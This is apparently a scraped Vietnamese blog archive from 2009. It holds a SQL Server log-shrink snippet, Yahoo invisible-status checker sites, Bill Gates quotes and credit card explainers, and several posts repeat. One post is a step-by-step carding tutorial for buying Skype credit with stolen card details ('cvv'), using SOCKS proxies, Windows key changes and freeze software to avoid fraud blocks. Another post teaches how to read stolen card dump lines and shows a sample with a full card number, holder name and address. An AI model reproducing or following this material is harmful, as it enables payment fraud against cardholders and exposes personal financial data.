This is sample for resize a SQL Server transaction log.
USE AdventureWorks;
GO
-- Truncate the log by changing the database recovery model to SIMPLE.01 ALTER DATABASE AdventureWorks
02 SET RECOVERY SIMPLE;
03 GO
04
05 -- Shrink the truncated log file to 1 MB.
06 DBCC SHRINKFILE (AdventureWorks_Log, 1);
07 GO
08
09 -- Reset the database recovery model.
10 ALTER DATABASE AdventureWorks
11 SET RECOVERY FULL;
12 GO
Thứ Sáu, 11 tháng 12, 2009
Chủ Nhật, 19 tháng 4, 2009
6 website giúp kiểm tra trạng thái YM
6 trang web cho phép bạn có thể kiểm tra trực tuyến trạng thái thực của một nick Yahoo Messenger là đang online, offline hay invisible một cách nhanh chóng và chính xác.
http://persiangap.com/
http://yahoo.from-magic.com/
http://www.invisible-scanner.com/
http://www.yahoo-detect.info/
http://www.pgranks.com
http://www.ydetector.com
Nhiệm vụ của bạn đơn giản chỉ là nhập Yahoo ID chính xác vào ô textbox rồi ấn nút Search bên cạnh, kết quả sẽ trả về tức khắc, một số trang không chỉ đưa ra kết quả nêu Status của nick mà còn có cả hình ảnh avatar và đường dẫn tới Profiles của nick đó đi kèm như hình minh họa dưới đây kiểm tra bằng trang http://persiangap.com/
Đôi khi các bạn không kiểm tra được vì có thể trang đó đang bị quá tải do nhiều người dùng quá. Lúc đó, các bạn hãy thử các trang web khác trong liệt kê. Chúc các bạn thành công!
http://persiangap.com/
http://yahoo.from-magic.com/
http://www.invisible-scanner.com/
http://www.yahoo-detect.info/
http://www.pgranks.com
http://www.ydetector.com
Nhiệm vụ của bạn đơn giản chỉ là nhập Yahoo ID chính xác vào ô textbox rồi ấn nút Search bên cạnh, kết quả sẽ trả về tức khắc, một số trang không chỉ đưa ra kết quả nêu Status của nick mà còn có cả hình ảnh avatar và đường dẫn tới Profiles của nick đó đi kèm như hình minh họa dưới đây kiểm tra bằng trang http://persiangap.com/
Đôi khi các bạn không kiểm tra được vì có thể trang đó đang bị quá tải do nhiều người dùng quá. Lúc đó, các bạn hãy thử các trang web khác trong liệt kê. Chúc các bạn thành công!
Thứ Bảy, 18 tháng 4, 2009
Tut reg phone out skype cho nhưng ai chưa biết
Tut reg phone out skype cho nhưng ai chưa biết
Mình thấy anh em nói chỉ reg được 10$ hay 10 euro thôi nhưng Gà có thể reg được 30$, 30 bảng, 30 euro.
Hôm nay Gà sẽ hướng dẫn thật tỉ mỉ để newbie anh em cùng reg Gà như mình còn reg được thì chắc chắn rằng anh em ai cũng reg được.
Sau đây là những chú ý khi xài skype không bị block.
1. Thứ nhất nghiêm cấm không chạy bằng IP việt nam, chạy IP US, EU, mĩ latinh đều được.
2. Nghiêm cấm trong 24 h không đựoc login vào 2 account trên cùng 1 PC, laptop vì skype nó check key win. Ta vẫn có thể log 2 acc được nếu chúng ta change key win,
Còn 1 chú ý nữa là có thể dùng pri sock, VNP… lưu ý là nếu máy không cài phần mêm đóng băng thì cũng rất dẽ bị block acc còn tại sao thì lát Gà sẽ nói rõ hơn.
Còn nữa phải nói kỹ cái này nữa anh em thật chú ý không được login vô 2 account trong vòng 24h với cùng 1 PC
Sau đây là các bước tiến hành.
Đầu tiên các bạn download bản setup ở skype.com, down bằng IP việt nam nha. Sau đó kiếm 1 con sock5 good nói chung là sock5 rồi fake ip toàn máy với proxifier cái này anh em chắc hiểu. Tiếp đó chúng ta tiến hành chạy bản setup. Nhớ là phải fake ip trước khi chạy bản setup nha! Không thì là công cốc, công cò đó anh em. sau khi chạy bản setup chung ta tiến hành dăng ký nói chung là user và pass do anh em chọn city thì lấy city của chủ thẻ.
Sau khi đăng ký thành công anh em ta vào phân account rồi chọn buy credit rồi làm các bước như ở đó họ hướng dẫn. Lưu ý anh em có thể chọn hình thức là USD, Euro, bảng anh… chỉ có 10$, 10 euro, 10 bảng
Sau khi buy xong anh em login vô account ở site skype.com để active thì account sẽ không bị block.
Làm thế nào để mua được account 20$, 30$… thì rất đơn giản nếu anh em đã mua được 10$, 10 Euro, 10 bảng rồi thì rất đơn giản anh em chỉ thực hiện lại thao tác như gà nói ban đầu là vào phần account chọn buy credit tiếp nó sẽ cho pay 10$, 10 euro.. tiếp cứ như vậy làm tiếp lần thứ 3. Mình Gà chỉ buy được 30$, 30 bảng… thui ai pro buy được hơn thì Share cho anh em.
Còn 1 cách nữa buy 20, 30 $.. là sau khi anh em đã buy được 10$, 10 euro rồi thì anh em login account vào site
https://secure.skype.com/account/login?message=login_required
Rồi chọn buy credit và làm tương tự như cách gà nói ở trên!
Còn loại cvv mà dễ qua skype nhất là master gà dung master không trượt em nào cả. Còn block thì cũng chưa thấy bao giờ chỉ khi nào chúng ta vi phạm các điều mà Gà đã lưu ý với anh em thi mới bị block thôi!
Sori vì net chỗ làm của Gà chậm quá không down được bản setup mà cái USB của Gà lại không tìm thấy nên ko có bản setup săn, gà không lam từng bước và chụp hình từng bước gà làm. Nhưng gà đã nói hết sức tỉ mỉ khi nào có time Gà sẽ làm từng bước và chụp hình cho anh em cẩn thận rồi chắc là anh em sẽ làm ok thôi!
Còn 1 lưu ý nữa là nếu mà các bạn đã reg được 1 account và buy thành công vói PC hay lap của bạn thì cũng đừng có tham mà reg thêm 1 cái account khác nữa sẽ block luôn đó. Muốn reg thì phải change key win hoặc đợi 24h sau nha! Anh em phải nhớ những điều mà gà đã dận không là phí cvv và sock đó!
Tại Sao máy không cài phần mềm đóng băng thì dễ bị block account chắc nhiều anh em đã hiểu nhưng gà vẫn phải nói vì nếu không cài thì khi anh em mở PC ỏ lap cái bản setup mà anh em cài nó vẫn còn nên viẹc block là hiển nhiên. IP việt mà. Chính vì vậy gà mong anh em cài phần mềm đóng băng còn bản setup thì anh em nên để o USB mỗi lần cần thì đem ra cài lại chỉ mất khoảng 1 phút thôi, như vậy thì anh em gọi thoải con gà mái chẳng bao giờ bị block cả!
Mình thấy anh em nói chỉ reg được 10$ hay 10 euro thôi nhưng Gà có thể reg được 30$, 30 bảng, 30 euro.
Hôm nay Gà sẽ hướng dẫn thật tỉ mỉ để newbie anh em cùng reg Gà như mình còn reg được thì chắc chắn rằng anh em ai cũng reg được.
Sau đây là những chú ý khi xài skype không bị block.
1. Thứ nhất nghiêm cấm không chạy bằng IP việt nam, chạy IP US, EU, mĩ latinh đều được.
2. Nghiêm cấm trong 24 h không đựoc login vào 2 account trên cùng 1 PC, laptop vì skype nó check key win. Ta vẫn có thể log 2 acc được nếu chúng ta change key win,
Còn 1 chú ý nữa là có thể dùng pri sock, VNP… lưu ý là nếu máy không cài phần mêm đóng băng thì cũng rất dẽ bị block acc còn tại sao thì lát Gà sẽ nói rõ hơn.
Còn nữa phải nói kỹ cái này nữa anh em thật chú ý không được login vô 2 account trong vòng 24h với cùng 1 PC
Sau đây là các bước tiến hành.
Đầu tiên các bạn download bản setup ở skype.com, down bằng IP việt nam nha. Sau đó kiếm 1 con sock5 good nói chung là sock5 rồi fake ip toàn máy với proxifier cái này anh em chắc hiểu. Tiếp đó chúng ta tiến hành chạy bản setup. Nhớ là phải fake ip trước khi chạy bản setup nha! Không thì là công cốc, công cò đó anh em. sau khi chạy bản setup chung ta tiến hành dăng ký nói chung là user và pass do anh em chọn city thì lấy city của chủ thẻ.
Sau khi đăng ký thành công anh em ta vào phân account rồi chọn buy credit rồi làm các bước như ở đó họ hướng dẫn. Lưu ý anh em có thể chọn hình thức là USD, Euro, bảng anh… chỉ có 10$, 10 euro, 10 bảng
Sau khi buy xong anh em login vô account ở site skype.com để active thì account sẽ không bị block.
Làm thế nào để mua được account 20$, 30$… thì rất đơn giản nếu anh em đã mua được 10$, 10 Euro, 10 bảng rồi thì rất đơn giản anh em chỉ thực hiện lại thao tác như gà nói ban đầu là vào phần account chọn buy credit tiếp nó sẽ cho pay 10$, 10 euro.. tiếp cứ như vậy làm tiếp lần thứ 3. Mình Gà chỉ buy được 30$, 30 bảng… thui ai pro buy được hơn thì Share cho anh em.
Còn 1 cách nữa buy 20, 30 $.. là sau khi anh em đã buy được 10$, 10 euro rồi thì anh em login account vào site
https://secure.skype.com/account/login?message=login_required
Rồi chọn buy credit và làm tương tự như cách gà nói ở trên!
Còn loại cvv mà dễ qua skype nhất là master gà dung master không trượt em nào cả. Còn block thì cũng chưa thấy bao giờ chỉ khi nào chúng ta vi phạm các điều mà Gà đã lưu ý với anh em thi mới bị block thôi!
Sori vì net chỗ làm của Gà chậm quá không down được bản setup mà cái USB của Gà lại không tìm thấy nên ko có bản setup săn, gà không lam từng bước và chụp hình từng bước gà làm. Nhưng gà đã nói hết sức tỉ mỉ khi nào có time Gà sẽ làm từng bước và chụp hình cho anh em cẩn thận rồi chắc là anh em sẽ làm ok thôi!
Còn 1 lưu ý nữa là nếu mà các bạn đã reg được 1 account và buy thành công vói PC hay lap của bạn thì cũng đừng có tham mà reg thêm 1 cái account khác nữa sẽ block luôn đó. Muốn reg thì phải change key win hoặc đợi 24h sau nha! Anh em phải nhớ những điều mà gà đã dận không là phí cvv và sock đó!
Tại Sao máy không cài phần mềm đóng băng thì dễ bị block account chắc nhiều anh em đã hiểu nhưng gà vẫn phải nói vì nếu không cài thì khi anh em mở PC ỏ lap cái bản setup mà anh em cài nó vẫn còn nên viẹc block là hiển nhiên. IP việt mà. Chính vì vậy gà mong anh em cài phần mềm đóng băng còn bản setup thì anh em nên để o USB mỗi lần cần thì đem ra cài lại chỉ mất khoảng 1 phút thôi, như vậy thì anh em gọi thoải con gà mái chẳng bao giờ bị block cả!
Thứ Năm, 9 tháng 4, 2009
10 câu nói bất hủ của Bill Gates !!!
1. “Cuộc sống vốn không công bằng - Hãy tập quen dần với điều đó.”
-> Thế giới không bao giờ công bằng. Bạn biết điều này chứ? Bạn không bao giờ có thể thay đổi cả thế giới. Sự bất công luôn tồn tại trong xã hội hiện tại, vì thế hãy cố gắng thích nghi.
2. “Không ai quan tâm đến lòng tự trọng của bạn đâu. Mọi người chỉ trông đợi bạn đạt được điều gì đó trước khi bạn cảm thấy hài lòng về bản thân.”
-> Lòng tự trọng thái quá có thể sẽ gây khó khăn cho công việc của bạn. Đừng quá đề cao lòng tự trọng của mình vì điều người ta quan tâm là bạn đạt được gì, chứ không phải là lòng tự trọng.
3. “Bạn sẽ không thể kiếm được 40.000 USD/năm ngay sau khi tốt nghiệp trung học. Bạn cũng không là một ông sếp lớn có điện thoại gắn trên ô tô cho đến khi bạn kiếm được hai thứ đó.”
-> Thường thường, bạn không thể giàu có nếu chỉ vừa mới tốt nghiệp trung học. Tuy nhiên, để trở thành một nhà quản lý cấp cao, bạn cần có cả hai: bằng tốt nghiệp trung học và tiền bạc.
4. “Nếu bạn nghĩ rằng giáo viên của mình thật hắc ám thì hãy đợi đến khi bạn làm việc dưới trướng một ông chủ. Rồi bạn sẽ thấy với ông ta thì không có khái niệm nhiệm kỳ nắm quyền.”
-> Đừng than vãn rằng sếp của bạn khó tính quá. Khi ngồi trên ghế nhà trường, lúc gặp khó khăn trong học tập thì có giáo viên giúp đỡ bạn. Tuy nhiên, nếu lúc đó bạn lại cảm thấy mọi khó khăn bạn gặp phải đều do những yêu cầu quá nghiêm khắc từ phía giáo viên, thì bạn đừng nên đi làm. Đơn giản là vì nếu không có những yêu cầu nghiêm khắc từ phía công ty, thì chắc chắn bạn sẽ không làm gì và nhanh chóng thất nghiệp. Và lúc này cũng sẽ không có ai giúp đỡ bạn cả.
5. “Nếu như bạn làm rối tung mọi chuyện lên thì đó không phải lỗi của bố mẹ bạn, thế nên đừng có mà ta thán về lỗi lầm của bạn, hãy rút kinh nghiệm từ chúng.”
-> Đừng quy thất bại của bạn cho định mệnh. Tất cả những gì bạn cần hiện giờ là giữ bình tĩnh và bắt đầu lại từ đầu.
6. “Trước khi bạn ra đời, bố mẹ của bạn đã chẳng "đáng chán" như bây giờ. Bố mẹ đã trả những hoá đơn của bạn, giặt giũ quần áo bạn sạch sẽ và lắng nghe bạn kể xem bạn sành điệu như thế nào. Vì vậy trước khi cằn nhằn bố mẹ điều gì thì hãy dọn dẹp buồng ngủ của bạn cho ngăn nắp đi đã.”
-> Bạn nên thể hiện lòng biết ơn của mình với bố mẹ vì đã dành phần lớn cuộc đời nuôi bạn khôn lớn. Sự “cổ lổ sĩ” của bố mẹ bạn ngày nay là cái giá họ phải trả cho sự lớn khôn của bạn.
7. “Ở trường học có thể không có người thắng kẻ thua nhưng ở trường đời thì không phải vậy. Ở một số trường học người ta còn hủy bỏ những điểm rớt và cho bạn cơ hội để bạn giành điểm cao. Trong cuộc sống thực không bao giờ có chuyện như thế đâu.”
-> Hãy tự nhủ rằng bạn luôn có thể trở thành người đứng đầu, như vậy bạn sẽ có nhiều động lực hơn để phấn đấu cho sự nghiệp của mình.
8. “Cuộc sống không được chia thành những học kỳ. Bạn cũng chẳng có mùa hè để nghỉ ngơi và rất ít ông chủ nào quan tâm và giúp bạn tìm ra cơ hội này. Hãy tự làm điều mình muốn trong thời gian nhàn rỗi của bạn.”
-> Đừng luôn ngóng chờ các ngày nghỉ lễ, nếu không bạn sẽ bị tụt hậu so với đồng nghiệp của mình. Sự tụt hậu này đồng nghĩa với sự đào thải và thất nghiệp.
9. “Truyền hình không phải là cuộc sống thực. Trong cuộc sống, người ta phải biết rời khỏi quán cà phê giải trí để đi làm việc.”
-> Ai cũng thích xem phim truyền hình. Tuy nhiên, bạn không nên xem quá nhiều vì đó không phải là cuộc sống của bạn và tư tưởng của bạn sẽ bị chúng ảnh hưởng. Cuộc sống của bạn nên do bạn quyết định.
10. “Hãy hòa nhã với những kẻ dở hơi. Ai biết được ngày sau và khi đó bạn có thể phải làm việc cho một kẻ như vậy.”
-> Bạn nên hòa nhã với mọi người. Trong cuộc sống luôn xảy ra những điều bạn không muốn chút nào. Hãy cởi mở với sếp và đừng nói xấu sau lưng họ vì nó sẽ chẳng giúp ích gì cho bạn đâu.
-> Thế giới không bao giờ công bằng. Bạn biết điều này chứ? Bạn không bao giờ có thể thay đổi cả thế giới. Sự bất công luôn tồn tại trong xã hội hiện tại, vì thế hãy cố gắng thích nghi.
2. “Không ai quan tâm đến lòng tự trọng của bạn đâu. Mọi người chỉ trông đợi bạn đạt được điều gì đó trước khi bạn cảm thấy hài lòng về bản thân.”
-> Lòng tự trọng thái quá có thể sẽ gây khó khăn cho công việc của bạn. Đừng quá đề cao lòng tự trọng của mình vì điều người ta quan tâm là bạn đạt được gì, chứ không phải là lòng tự trọng.
3. “Bạn sẽ không thể kiếm được 40.000 USD/năm ngay sau khi tốt nghiệp trung học. Bạn cũng không là một ông sếp lớn có điện thoại gắn trên ô tô cho đến khi bạn kiếm được hai thứ đó.”
-> Thường thường, bạn không thể giàu có nếu chỉ vừa mới tốt nghiệp trung học. Tuy nhiên, để trở thành một nhà quản lý cấp cao, bạn cần có cả hai: bằng tốt nghiệp trung học và tiền bạc.
4. “Nếu bạn nghĩ rằng giáo viên của mình thật hắc ám thì hãy đợi đến khi bạn làm việc dưới trướng một ông chủ. Rồi bạn sẽ thấy với ông ta thì không có khái niệm nhiệm kỳ nắm quyền.”
-> Đừng than vãn rằng sếp của bạn khó tính quá. Khi ngồi trên ghế nhà trường, lúc gặp khó khăn trong học tập thì có giáo viên giúp đỡ bạn. Tuy nhiên, nếu lúc đó bạn lại cảm thấy mọi khó khăn bạn gặp phải đều do những yêu cầu quá nghiêm khắc từ phía giáo viên, thì bạn đừng nên đi làm. Đơn giản là vì nếu không có những yêu cầu nghiêm khắc từ phía công ty, thì chắc chắn bạn sẽ không làm gì và nhanh chóng thất nghiệp. Và lúc này cũng sẽ không có ai giúp đỡ bạn cả.
5. “Nếu như bạn làm rối tung mọi chuyện lên thì đó không phải lỗi của bố mẹ bạn, thế nên đừng có mà ta thán về lỗi lầm của bạn, hãy rút kinh nghiệm từ chúng.”
-> Đừng quy thất bại của bạn cho định mệnh. Tất cả những gì bạn cần hiện giờ là giữ bình tĩnh và bắt đầu lại từ đầu.
6. “Trước khi bạn ra đời, bố mẹ của bạn đã chẳng "đáng chán" như bây giờ. Bố mẹ đã trả những hoá đơn của bạn, giặt giũ quần áo bạn sạch sẽ và lắng nghe bạn kể xem bạn sành điệu như thế nào. Vì vậy trước khi cằn nhằn bố mẹ điều gì thì hãy dọn dẹp buồng ngủ của bạn cho ngăn nắp đi đã.”
-> Bạn nên thể hiện lòng biết ơn của mình với bố mẹ vì đã dành phần lớn cuộc đời nuôi bạn khôn lớn. Sự “cổ lổ sĩ” của bố mẹ bạn ngày nay là cái giá họ phải trả cho sự lớn khôn của bạn.
7. “Ở trường học có thể không có người thắng kẻ thua nhưng ở trường đời thì không phải vậy. Ở một số trường học người ta còn hủy bỏ những điểm rớt và cho bạn cơ hội để bạn giành điểm cao. Trong cuộc sống thực không bao giờ có chuyện như thế đâu.”
-> Hãy tự nhủ rằng bạn luôn có thể trở thành người đứng đầu, như vậy bạn sẽ có nhiều động lực hơn để phấn đấu cho sự nghiệp của mình.
8. “Cuộc sống không được chia thành những học kỳ. Bạn cũng chẳng có mùa hè để nghỉ ngơi và rất ít ông chủ nào quan tâm và giúp bạn tìm ra cơ hội này. Hãy tự làm điều mình muốn trong thời gian nhàn rỗi của bạn.”
-> Đừng luôn ngóng chờ các ngày nghỉ lễ, nếu không bạn sẽ bị tụt hậu so với đồng nghiệp của mình. Sự tụt hậu này đồng nghĩa với sự đào thải và thất nghiệp.
9. “Truyền hình không phải là cuộc sống thực. Trong cuộc sống, người ta phải biết rời khỏi quán cà phê giải trí để đi làm việc.”
-> Ai cũng thích xem phim truyền hình. Tuy nhiên, bạn không nên xem quá nhiều vì đó không phải là cuộc sống của bạn và tư tưởng của bạn sẽ bị chúng ảnh hưởng. Cuộc sống của bạn nên do bạn quyết định.
10. “Hãy hòa nhã với những kẻ dở hơi. Ai biết được ngày sau và khi đó bạn có thể phải làm việc cho một kẻ như vậy.”
-> Bạn nên hòa nhã với mọi người. Trong cuộc sống luôn xảy ra những điều bạn không muốn chút nào. Hãy cởi mở với sếp và đừng nói xấu sau lưng họ vì nó sẽ chẳng giúp ích gì cho bạn đâu.
Thứ Bảy, 28 tháng 2, 2009
Tìm hiểu về thẻ tín dụng (cc)
Credit Cards hay các thẻ tín dụng đối với đa số người Việt tại hải ngoại không có gì là mới mẻ, đã có nhiều bài viết về vấn đề này rồi nên cũng chỉ lập lại và thêm chút xíu thôi. Mình thấy nguồn lợi tức chính của các ngân hàng không phải là cho các công ty lớn vay muợn hàng trăm triệu dollars để thu lời mà do tiền lời và lệ phí thu được từ các thẻ tín dụng . Nói ra chắc các bạn không tin, nhiều khi ngân hàng thu lời đuợc 100% từ tiền cho vay ở thẻ tín dụng . Ví dụ ngân hàng A cấp cho anh B một thẻ tín dụng với credit line là $500.00 USD và annual fee là $79.00 USD một năm tiền lời là 19.9%/năm nếu anh B xài quá credit line của mình thì tiền lời sẽ là 26.5%/năm và mỗi lần vuợt qua giới hạn ( over limit fee ) sẽ bị phạt $39.00/lần, anh B này trả trễ cũng bị phạt $39.00 USD/lần . Các bạn thử cộng lại sẽ thấy anh B này đã tốn bao nhiêu tiền cho ngân hàng
- Việt Nam trong tưong lai thẻ tín dụng cũng sẽ đưọc phổ biến rộng rãi đến mọi tầng lớp xã hội, vì vậy chúng ta cũng nên tìm hiểu thêm về vấn đề này . Vivi sẽ tham khảo từng bước với các bạn về thẻ tín dụng:
Trong một giao dịch bán lẻ truyền thống các vạch từ được đọc bởi thiết bị đầu cuối của điểm mua bán . Mã số kiểm tra giá trị sử dụng của Visa card ( CVV ) hay Mastercard ( CVC ) được mã hoá trong các vạch này có thể được người phát hành thẻ kiểm tra trong thời gian còn hiệu lực sử dụng . Tuy nhiên nếu thẻ không còn giá trị sử dụng thì thẻ CVV hay thẻ CVC không còn hợp lệ nữa . Để giảm hiện tượng lừa đảo trong môi trường sử dụng card không hiện hữu ( card ảo ) những người mua hàng ,nhà buôn và người dùng thẻ sử dụng cvv2 hay cvc2 :
- Vậy Cvv2 Hay Cvc 2 Là Gì :
cvv2 hay cvc2 là mã số bảo mật gồm bộ ba kí tự số được in ở mặt sau card , những số này xuất hiện ở dạng nghiêng ngược ở ngay đầu khung chữ kí và ở cuối ( xem mã u ) . Chương trình này giúp hiệu lực hoá một thẻ đang sử dụng trong giao dịch . Tất cả các thẻ Mastercard , cả thẻ tín dụng lẫn thẻ nợ , được cc yêu cầu là phải có chữ a CVC2 trước ngày 1/1/97 còn tất cả các thẻ VISA phải là 1/1/1001
- CVV2 Hay CVC2 Hoạt Động Như Thế Nào :
Các nhà buôn thẻ ảo được hướng dẫn rằng phải yêu cầu người giữ thẻ xuất trình cvv2 /cvc2 khi người giữ thẻ đặt hàng . Nhà buôn yêu cầu người giữ thẻ đọc mã số này từ thẻ . Sau đó nhà buôn yêu cầu kiểm tra cvv2/cvc2 trong quá trình được sử dụng . Người phát hành thẻ xác định tính hợp lệ của cvv2 hay cvc2 và truyền đi kết quả từ chối hay chấp nhận trong quá trình được quyền sử dụng . Nhà buôn bằng cách sử dụng cvv2/cvc2 cùng với dịch vụ kiểm tra địa chỉ ( AVS) và những phút bàn về quyền sử dụng sau đó có thể thực hiện các quyết Ċ ?ịnh có nhiều thông tin hơn đối với việc chập thuận việc giao dịch đó hay không . . Ngoài ra khi sử dụng cvv2/cvc2 các nhà buôn có thể hi vọng giảm được chi phí trả lại ( chargeback) ít nhất là 26%
-Thay đổi đối với khung chữ kí
Trước đây các số cvv2 hay cvc2 đi theo sau số tài khoản 16 số in ở khung chữ kí của thẻ . Số tài khoản 16 số bây giờ đã bị cắt ngắn còn 4 số trên khung chữ kí . Sự thay đổi này giúp người sử dụng thẻ ký thẻ của họ dễ dàng hơn . Nó cũng giúp nhà buôn dễ dàng hơn khi so sánh chữ kí trên thẻ và chữ kí trên phiếu bán hàng . 19 chữ số ( 16 + 3 ) không còn gây cản trở trong việc kiểm tra chữ kí nữa
- Mã Số Kết Quả Là Gì :
+ Định nghĩa :
M : cvv2 khớp nói chung là bạn muốn thúc đẩy các giao dịch mà bạn đã nhận được chứng nhận thẩm quyền sử dụng ( một cvv2 khớp và một thẻ kiểm tra địa chỉ khớp nếu cần )
N : Cvv2 không khớp có lẽ bạn phải tiếp tục làm việc với người sử dụng thẻ trước khi thực hiện giao dich ngay cả khi bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng . Nếu bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng nhưng bạn nghĩ rằng một giá trị cvv2 không có lẽ đã được gửi đi trước bạn có thể gửi trả lại cvv2 nhưng phải chắc chắn rằng đã sử dụng số tiền $ là 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa
P : Yêu cầu cvv2 không được thực hiện hoặc ngày hết hạn không được cung cấp , hoặc card không có giá trị cvv2 . Nếu ngày hết hạn để trống hãy nộp lại như là số tiền $ = 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa
S: Cvv2 có trên card nhưng nhà buôn gửi một mã số nói rằng không có cvv2 . Có lẽ bạn phải làm việc lại tiếp tục với khách hàng để kiểm tra lại rằng khách hàng đã kiểm tra vị trí chính xác đối với số cvv2
U: Người phát hàng không ủng hộ Cvv2
Link Address Verification Service ( AVS )
Atlantic Payment - Dịch vụ kiểm tra địa chỉ : Nếu bạn là nhà buôn dùng thẻ tín dụng , bạn có thể so sánh địa chỉ chi trả của khách hàng USA tại ngân hàng phát hành trước khi hoàn thành một giao dịch mà vạch từ không thể đọc đuợc . Quá trình kiểm tra này yêu cầu cần thiết nếu bạn là nhà buôn dùng thư tín , internet , thư tín hay điện thoại ...
Khi yêu cầu kiểm tra tín dụng thông thường hay uỷ quyền sử dụng bạn phải nhập thông tin địa chỉ chi trả do người sử dụng card cung cấp , khi hệ thống máy tính tiếp xúc với người phát hành và yêu cầu chứng nhận tín dụng , thì thông tin địa chỉ được so sánh vói thông tin trên hồ sơ tại nơi người phát hành . Người phát hành sẽ gửi một mã số phúc đáp với một phúc đáp về thẩm quyền sử dụng tín dụng . Bạn sẽ thực hiện các quyết định kinh doanh sử dụng sau khi xử lý các phúc đáp khác nhau . Tuy nhiên bạn phải luôn nhớ rằng khi một khách hàng cáo buộc rằng họ không hề gửi một đơn đặt hàng bằng mail , điện thoại hay inernet với bạn thì AVS " khớp chính xác " X"hay " Y " sẽ giúp bạn bác bỏ cáo buỊ ?c đó . Và hãy nhớ rằng rất nhiều thiết bị xử lý () sẽ không xử lý các giao dịch mua bán với mã số phúc đáp " N" . Hãy tiến hành một cách thận trọng
Có rất nhiều bạn khi nhìn thấy CC được post lên lại hỏi những câu đại loại như :
- Cái đống trên đây là gì thế , sử dụng như thế nào ?
- Cái Name on Card đâu ... Address ở chỗ nào ?
THÔNG TIN VỀ CARD
Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :
+ Name on Card hay Card holder : Họ tên chủ thẻ .
+ Billing or Mailing Address : Địa chỉ .
+ City : Thành phố .
+ State : Bang ( của Mẽo và Canada ) .
+ Zip COde ( Post code ) : Mã vùng .
+ Card number : Số thẻ .
+ Card Exp date : ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :
+ Phone number : Số phone ( 11 số ) .
+ Fax Number : Số Fax ( 11 số ) .
hay nhất là khi CC của bạn có cái này :
+CVV2 hay CVN : cái này là mã số bảo mật in trên CC .
KINH NGHIỆM
Không có gì hơn là phải dùng nhiều , nhìn nhiều rồi sẽ quen thôi
-----Sẽ dễ dàng hơn nếu bạn có một vốn tiếng Anh kha khá-----
+ Một đống như sau :
VISA Brett Crow 4300230019306705 11/03 Brett Crow 7 Spruce Street Esko, Minnesota 55733 (XXX)-XXX-XXXX XXX
- Các bạn nhìn cái nào có vẻ là tên người thì nó là Name đấy ( Đừng có cười ! Sự thật đấy ) . Thông thường thì name nằm ở đầu hoặc ngay sau cái Exp date . Như ở đây nó là Brett Crow .
- VISA là nói đây là một cái VISA .
- Một chuỗi 16 con số bắt đầu = 3,4,5 hoặc 6 tùy loại card là CC number . ở đây là 4300230019306705
- Một cụm có cấu tạo theo dạng : AB/CD hay 4 số liên tiếp ABCD là Exp date . thường Exp nằm ở ngay sau CC Number . Ở đây là 11/03 Tức là tháng 11 năm 2003 .
- Sau tên hoặc Exp date sẽ là Address ! Có cấu trúc dạng : [Số] [ Chữ ] ...... thường hay kết thúc = street, driver, Dr, .... thường thôi nhé chứ không phải là tất cả đâu . Đặc biệt có một số địa chỉ có dạng P.O Box [........] đây là hộp thư lưu trú đăng ký ở bưu điện ! Ở đây address là : 7 Spruce Street .
- Zipcode ( Post code ) : Một chuỗi có 5 số ( Mẽo Only ) nhưng nhiều khi lại có ngoại lệ . ở đây zip là 55733 .
- State : Có thể Viết tắt ( 2 chữ cái viết hoa ) hoặc viết full . Dùng nhiều sẽ thuộc State ( Bọn mẽo có bao nhiu bang ý, quên mất roài ) . State thường đứng ngay sau City và đứng ngay trước Zip ! Ở dống này là Minnesota .
- City : không có gì đặc biệt ngoài việc nó đứng sau Address và trước state .
- Phone : Một dãy 11 số có cấu trúc dạng : (XXX)-XXX-XXXX hay XXX-XXXXXXX ...... XXXXXXXXXX . Phone thường đứng sau Zip. Nếu liền cạnh Phone có một dãy cấu trúc tương tự thì đó là số Fax .
- Đống này không có Phone nhưng bạn có thể tìm thấy Phone = 1 cách rất đơn giản : sang một search engine (máy tìm kiếm ) bất kỳ ví dụ như là http://www.google.com/ hay http://www.av.com/ nhập Zip của bạn vào trường search rồi tìm ! Kết quả sẽ là rất nhiều địa chỉ trong đó có số phone thuộc thành phố có Zip code giống bạn ! ! Dễ dàng thế thôi !
- CVV2 : Nếu CC Number của bạn có đầu 4 hay 5 thì CVV sẽ có 3 số . Còn nếu đầu 3 hay 6 thì sẽ có 4 số ! CVV2 nằm ở cuối cùng của đống . ! Ở đây không có Cvv2 thực mình dùng tạm XXX !
1- Thẻ tín dụng là gì ?
2- Có bao nhiêu loại thẻ tín dụng ?
3- Ai có thể xin thẻ tín dụng và làm sao để xin ?
4- Xin thì dễ mà giữ cho tốt mới là khó !
5- Trả không nổi nợ thẻ tín dụng thì sao ?
6- Làm sao để làm tốt lại tín dụng xấu ?
7- Những điều nên biết về credit score
8- Thẻ tín dụng manh laị những lơị ích gì ?
Đây là một tài liệu rất hữu ít cho bất cứ ai đang sống ở bất cứ nơi nào trên thế giới . Vì thẻ tín dụng và tín dụng đang được xử dụng rộng rãi , và trong tương lai sẽ thay thế hẳn tiền mặt
I - Thẻ Tín Dụng Là Gì ?
1 - Lịch sử thẻ tín dụng:
Khoảng hơn 3000 năm trước đây, do nhu cầu trao đổi hàng hoá đòi hỏi và để cho sự buôn bán của các doanh thương thời đó tiện lợi hơn, nên tín dụng đã lần đầu tiên được xử dụng tại Assyria, Babylon và Egypt, mãi tới đầu thế kỷ 14 ngân phiếu tiền trang ( Bill of exchange) và chi phiếu ( forerunner of banknotes, mới được mới được hình thành, các món nợ và thanh toán hoá đơn được giải quyết bằng cách trả trước 1/3 tiền mặt ( coins ) phần còn lại bằng Bill of exchange . Cho đến thế kỷ 17th sự phát minh ra tiền giấy , thì việc mua bán và trao đổi mới dễ dàng hơn nhiều.
